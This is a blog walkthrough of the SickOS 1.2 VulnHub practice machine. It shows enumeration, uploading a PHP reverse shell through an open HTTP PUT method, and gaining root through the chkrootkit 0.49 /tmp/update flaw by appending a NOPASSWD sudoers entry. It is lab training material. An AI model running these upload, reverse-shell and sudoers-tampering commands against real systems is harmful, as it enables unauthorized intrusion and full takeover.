Setup

Attacker(kali):192.168.146.128

VulnHub Link:https://www.vulnhub.com/entry/sickos-12,144/

VM Network:NAT

Enumeration

Host Enumeration

Use the arp-scan to find the vm's IP address: sudo arp-scan -l

Get the BOX's IP :192.168.146.135

Port Enumeration

Do a quick port enumeration with rustscan: rustscan -a 192.168.146.135

Do a full port enumeration background with nmap: sudo nmap -T5 -A -p- -Pn 192.168.146.135 -oN nmap.txt

└─$ sudo nmap -T4 -A -p- -Pn 192.168.146.135 -oN nmap.txt
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 16:34 CST
Nmap scan report for 192.168.146.135
Host is up (0.00082s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 668cc0f2857c6cc0f6ab7d480481c2d4 (DSA)
|   2048 ba86f5eecc83dfa63ffdc134bb7e62ab (RSA)
|_  256 a16cfa18da571d332c52e4ec97e29eaf (ECDSA)
80/tcp open  http    lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:60:B3:F0 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.82 ms 192.168.146.135

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.45 seconds

According to the result, there are 2 ports open (ssh,http) and the http was running a lighttpd server.

HTTP Enumeration

Check the website in the browser:http://192.168.146.135

It seems to be none info useful for me:

Use gobuster to perform a directory bruteforce:gobuster dir -u http://192.168.146.135 -t 100 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

Also, nmap can do that too: nmap -p 80 192.168.146.135 --script http-enum

└─$ nmap -p 80 192.168.146.135 --script http-enum
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 17:19 CST
Nmap scan report for 192.168.146.135
Host is up (0.00079s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|_  /test/: Test page

Nmap done: 1 IP address (1 host up) scanned in 19.06 seconds

Finnaly, I got a /test entry and it took me to a lighttpd webserver:

Foothold

Exploiting file upload via PUT request

And with nmap I can do something more: nmap -p 80 192.168.146.135 --script http-methods --script-args http-methods.url-path='/test'

└─$ nmap -p 80 192.168.146.135 --script http-methods --script-args http-methods.url-path='/test'
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 17:22 CST
Nmap scan report for 192.168.146.135
Host is up (0.00076s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-methods: 
|   Supported Methods: PROPFIND DELETE MKCOL PUT MOVE COPY PROPPATCH LOCK UNLOCK GET HEAD POST OPTIONS
|   Potentially risky methods: PROPFIND DELETE MKCOL PUT MOVE COPY PROPPATCH LOCK UNLOCK
|_  Path tested: /test

Nmap done: 1 IP address (1 host up) scanned in 16.43 seconds

According to the result I found that the PUT method is enabled. That means I could try to upload files most likely a reverse shell onto the webserver.

Use the php-reverse-shell.php:cp /usr/share/webshells/php/php-reverse-shell.php ./

And change the $ip,$port:

Upload the shell with curl: curl -T php-reverse-shell.php http://192.168.146.135/test/reverse.php --http1.0

Making the request via browser while keeping the netcat in listening mode. Then I got the shell: nc -lnvp 443

I tried port 1234, 4444 and they didn’t worked. Finally, I found it work on port 443.

Privilege Escalation

Get the bash session through python: python -c 'import pty; pty.spawn("/bin/bash")'

Then I do some easy actions such like check the /tmp,/opt etc directories and the ps list. But unfortunately there were nothing useful I could find.

Then I use the linpeas.sh script to help me out: https://github.com/carlospolop/PEASS-ng/releases

Upload it through curl: curl -T linpeas.sh http://192.168.146.135/test/linpeas.sh --http1.0

chmod the linpeas.sh and run it:

cd /var/www/test/
chmod +x linpeas.sh
./linpeas.sh

After a while, I got the result and I noticed a cron job that runs daily to run chkrootkit. That might be what I'm looking for.

Run it with -v to found the version:

Use the searchsploit to check if there are some vulns I could use:

I got the key from the 33899.txt:

Steps to reproduce:

- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.

The next step was simple, just create the file /tmp/update with the command below:

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

Remember to chmod +x /tmp/update

Wait a few seconds, then just run sudo su to gain the root access:

Proof

cd to /root and got the proof:

Key Learnings From this BOX

If I just run a directory brute forcing tool like gobuster then I only found the /test directory without analyzing the http methods, I would have missed the fact that I can actually upload a reverse shell.

  • Check the http methods
  • chkrootkit 0.49 - Local Privilege Escalation
  • /etc/sudoers format to add entry: www-data ALL=(ALL)NOPASSWD:ALL
文章作者: z0sen
版权声明: 本站所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 z0sen's Blog
Walkthrough Linux VulnHub
喜欢就支持一下吧